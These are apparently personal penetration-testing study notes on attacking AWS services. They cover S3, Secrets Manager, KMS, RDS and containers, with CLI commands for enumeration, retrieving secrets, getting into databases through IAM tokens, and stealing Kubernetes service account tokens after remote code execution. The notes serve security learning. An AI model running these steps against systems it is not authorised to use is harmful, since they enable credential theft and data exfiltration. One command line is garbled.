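Given the URL format above, a quick hedged check for public (unauthenticated) access to a bucket or object (bucket-name, region, and key are placeholders):

bash
# Unauthenticated listing/download with the CLI
aws s3 ls s3://bucket-name --no-sign-request
aws s3 cp s3://bucket-name/folder1/object3.jpeg . --no-sign-request

# Or straight over HTTPS
curl https://bucket-name.s3.region.amazonaws.com/
curl -O https://bucket-name.s3.region.amazonaws.com/folder1/object3.jpeg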

S3 Access Policies

  • Resource-Based policies:

    • Are attached to a resource: an S3 bucket or object.
    • with it we can specify who has access to the resource and what actions they can perform on it.
    • It has 4 types:
      • Public Access
      • ACLs: are for both Bucket level and Object level.
      • Bucket Policies: Only for bucket level (condition-based).
      • Pre-signed URLs: time-limited URLs; we can generate a URL for a resource that is only valid for a period of time we define. Pasted-image-20221106002002.png Pasted-image-20221106002044.png

    Notes:

    • Public Access: has higher priority than other policies, and with it we can allow or deny public access to all buckets & objects instantly. Pasted-image-20221105221935.png
    • Whenever we see a Principal attribute, that means this is a resource-based policy Pasted-image-20221106000822.png
  • Identity-Based policies:

    • Are attached to an IAM User, group or role.
    • Let us specify what the identity can do.
    • Permissions are attached to the entity through policies Pasted-image-20221106001653.png Pasted-image-20221106001722.png

Attacking S3

Enumeration

  • List all buckets in aws account

    bash
    aws s3api list-buckets
  • Get info about bucket ACL

    bash
    aws s3api get-bucket-acl --bucket bucket-name
    • This AllUsers grantee means it's open to the public. Pasted-image-20221107025937.png
    • This means that all AuthenticatedUsers can read ACP (Access Control Policy) Pasted-image-20221107030232.png
  • Get info about bucket policy

    bash
    aws s3api get-bucket-policy --bucket bucket-name
  • Retrieve the public-access-block configuration of a bucket

    bash
    aws s3api get-public-access-block --bucket bucket-name
    • Pasted-image-20221107031142.png
  • List Objects in a bucket

    bash
    aws s3api list-objects --bucket bucket-name
  • Get ACL of an object

    bash
    aws s3api get-object-acl --bucket bucket-name --key object-name

Exfiltration

  1. URL: Pasted-image-20221107031939.png
  2. Pre-Signed URL:
    • Generate pre-signed-url
      bash
      aws s3 presign s3://bucket-name/object-name --expires-in seconds
    • We can access it directly from any browser
  3. Authenticated-Users using CLI/API
    bash
    aws s3api get-object --bucket bucket-name --key object-name download-file-location

Secret Manager

  • It's an AWS service that encrypts & stores sensitive data transparently.
  • It's designed to store application credentials that are changed periodically and can't be stored in plain text.
  • Types of secrets we can store
    • Pasted-image-20221108035604.png
  • It uses keys from AWS KMS (Key Management Service) to encrypt & decrypt the secrets (passwords, SSH private keys, ..) stored in Secrets Manager
  • Pasted-image-20221108034548.png
  • Pasted-image-20221108035146.png
  • We can assign permissions to access these secrets via 2 types of policies:
    • Resource-Based Policies:
      • We can define the policy on the Secret itself.
    • Identity-Based Policies
      • We can define the policy on the entity that should access the secret.

KMS

  • Key Management Service: it's a service used to manage cryptographic keys.
  • It's used by Secrets Manager, which uses its keys to encrypt/decrypt its secrets.
  • It has 2 main keys:
    • CMK customer master key
      • Here is how we create a CMK
      • Pasted-image-20221108040551.png
    • AMK (AWS managed key)
      • Ex: Secrets Manager automatically creates a key in KMS when it is initiated.

Attacking Secret Manager

Enumeration

bash
# List Secrets in `Secrets-Manager`
aws secretsmanager list-secrets
 
# Describe specific secret
aws secretsmanager describe-secret --secret-id secretid
 
# Get a specific secret
aws secretsmanager get-secret-value --secret-id secretid
 
# Get the `resource-based policy` of a specific secret
aws secretsmanager get-resource-policy --secret-id secretid
 
# List keys
aws kms list-keys
 
# Describe a specific key
aws kms describe-key --key-id keyid
 
# List policies attached to a key
aws kms list-key-policies --key-id keyid
 
# Get full info about a key policy
aws kms get-key-policy --key-id keyid --policy-name policyname
 
# Decrypt  files with `KMS`
aws kms decrypt --ciphertext-blob fileb://encrypted-file.txt --output text --query Plaintext
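The Plaintext value returned by the CLI is base64-encoded, so a hedged one-liner to recover the original content (file names are placeholders):

bash
aws kms decrypt --ciphertext-blob fileb://encrypted-file.txt --output text --query Plaintext | base64 -d > decrypted-file.txt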

RDS

  • Relational Database Service.
  • It's a web service that makes it easy to operate and scale relational databases (MariaDB, MySQL, Amazon Aurora, SQL Server, PostgreSQL).

RDS Authentication Methods:

  • Pasted-image-20221108061453.png
  • Password
  • Password + IAM
    • When using an IAM role, a token is generated for the role that is only valid for 15 minutes.
  • Password + Kerberos Based
    • Whether or not you have a password, you can still authenticate via Kerberos

RDS Access Restrictions

  1. IAM level access restriction.
  2. Network level access restriction.

Pasted-image-20221108061748.png

RDS Proxy

  • Pasted-image-20221108062831.png
  • Handles the traffic between the application and RDS.
  • Helps enforce IAM authentication: the credentials are stored in Secrets Manager, the proxy accesses RDS via that secret, and the proxy can fetch the secret by using an IAM role.

Attacking RDS

Enumeration

bash
# Get info about `RDS` Clusters
aws rds describe-db-clusters
 
# Get info about stand-alone instances (not in cluster)
aws rds describe-db-instances
 
# Enumerate Subnet groups
aws rds describe-db-subnet-groups
 
# Enumerate DB Security Groups
aws rds describe-db-security-groups
 
# Enumerate `RDS` proxies
aws rds describe-db-proxies
  • Enumerating RDS proxies is important because a proxy can have the rights to access the DB. So by abusing it, we can access the DB without having credentials

VPC Security Groups vs DB Security Groups:

  • VPC Security Groups: a virtual firewall that controls the traffic to & from database instances that are part of a VPC.
  • DB Security Groups: a virtual firewall that controls the traffic to & from database instances that are NOT part of a VPC.

Exfiltration

List DB Instances

bash
aws rds describe-db-instances
  • MasterUsername can be found in the description of the DB Pasted-image-20221113053749.png
bash
aws ec2 describe-security-groups --group-ids GroupID

Connect to DB using Basic Authentication

bash
mysql -h HostName -u UserName -pPassword -P Port

IAM-based authentication

bash
aws sts get-caller-identity
  • If we run this command from within an EC2 instance, we can get the role (and its privileges) that the instance is using Pasted-image-20221113054155.png

List all Attached policies to this Role

bash
aws iam list-attached-role-policies --role-name ROLE-NAME
aws iam get-policy-version --policy-arn POLICY-ARN --version-id v1
  • Always remember to enumerate the policy Versions
  • This action indicates that this instance has the rights to authenticate to all the databases Pasted-image-20221113055342.png

Generate a DB auth token from the EC2 instance that has the role, and store it in an environment variable:

bash
Token"(aws rds generate-db-auth-token --username USERNAME --region REGION)"

Pasted-image-20221113055845.png

Get Access to the DB

bash
mysql -h HostName -u UserName --password="$TOKEN" -P PORT --enable-cleartext-plugin

Pasted-image-20221113060942.png

Containers

can be broken down into 3 concepts:

  1. Registry
    • It's a place where Docker images are stored, e.g.:
      • ECR Elastic container registry.
      • Docker Hub
  2. Orchestration
    • Manages when and where your containers run, ex:
      • ECS Elastic container service.
      • EKS Elastic kubernetes service.
  3. Compute
    • Computing engines used to run containers
      • FARGATE serverless compute engine.
      • EC2 virtual machine.
  • Normal VS Cloud Containerization Pasted-image-20221116230526.png

  • Docker and Kubernetes on AWS Pasted-image-20221116231703.png

  • EKS cluster Pasted-image-20221116231259.png

Enumeration

bash
# Describe all repositories in the container registry
aws ecr describe-repositories
 
# Get info about repository policy
aws ecr get-repository-policy --repository-name rep-name
 
# List images in repository
aws ecr list-images --repository-name rep-name
 
# Get info about container image
aws ecr describe-images --repository-name repo-name --image-ids imageTag=image-tag
 
# List `ECS` clusters
aws ecs list-clusters
 
# Get info about specific cluster
aws ecs describe-clusters --clusters cluster-name
 
# Get info about specific service
aws ecs describe-services --cluster cluster-name --services service-name
 
# List tasks in cluster
aws ecs list-tasks --cluster clustername
 
# Get info about specific task
aws ecs describe-tasks --cluster cluster-name --tasks taskARN
 
# List all containers in cluster
aws ecs list-container-instances --cluster cluster-name
 
# List all `EKS` clusters
aws eks list-clusters
 
# Get info about specific cluster
aws eks describe-cluster --name cluster-name
 
# List node groups in cluster
aws eks list-nodegroups --cluster-name clustername
 
# Get info about a specific node group in cluster
aws eks describe-nodegroup --cluster-name cluster-name --nodegroup-name nodegroup-name
 
# List all `Fargate` in a cluster
aws eks list-fargate-profiles --cluster-name cluster-name
 
# Get info about specific `Fargate` profile in a cluster
aws eks describe-fargate-profile --cluster-name cluster-name --fargate-profile-name profile-name
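If the repository policy allows it, the images themselves can be pulled and inspected locally. A hedged sketch (the account ID, region, and repository name are placeholders; requires Docker and AWS CLI v2):

bash
# Authenticate Docker to the ECR registry
aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin 123456789012.dkr.ecr.us-east-1.amazonaws.com

# Pull an image enumerated with list-images and dig through its filesystem/history
docker pull 123456789012.dkr.ecr.us-east-1.amazonaws.com/rep-name:latest
docker history 123456789012.dkr.ecr.us-east-1.amazonaws.com/rep-name:latest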

Kubernetes service accounts and tokens

  • Kubernetes has service accounts

  • These service accounts are used to manage Kubernetes resources (pods, nodes, deployments, ...) from within a pod

  • Creating a service account

    bash
    kubectl create sa service-acc
  • Get service accounts

    bash
    kubectl get sa
  • Getting the Kubernetes token from a vulnerable running EKS container via an RCE

    bash
    cat /var/run/secrets/kubernetes.io/serviceaccount/token
  • Before Kubernetes 1.24, this service account automatically has a token (secret) created for it; we can get it with

    bash
    kubectl get secret

    Pasted-image-20221117012937.png

  • Get a secret

    bash
    kubectl describe secret secret-name
  • After 1.24 you have to create it yourself

    bash
    kubectl create token service-acc
  • This token is a JWT, and after 1.24 it has an expiration date/time.

  • We can define the duration with

    bash
    kubectl create token service-acc --duration=1000h
  • The service account's secret is mounted inside the pod; we can find where it's mounted with

    bash
    kubectl describe pod nginx

    Pasted-image-20221117013935.png

  • Get the secret

    bash
    kubectl exec -it nginx -- cat /var/run/secrets/kubernetes.io/serviceaccount/token
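Once the service account token has been read from inside the pod, it can be used to talk to the Kubernetes API server directly. A hedged sketch run from inside the compromised pod (KUBERNETES_SERVICE_HOST/PORT are the standard in-pod environment variables; -k / --insecure-skip-tls-verify skip certificate validation):

bash
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# Raw API call with the stolen token
curl -k -H "Authorization: Bearer $TOKEN" "https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT/api/v1/namespaces/default/pods"

# Or with kubectl, if it is available in the pod
kubectl --token "$TOKEN" --server "https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT" --insecure-skip-tls-verify get pods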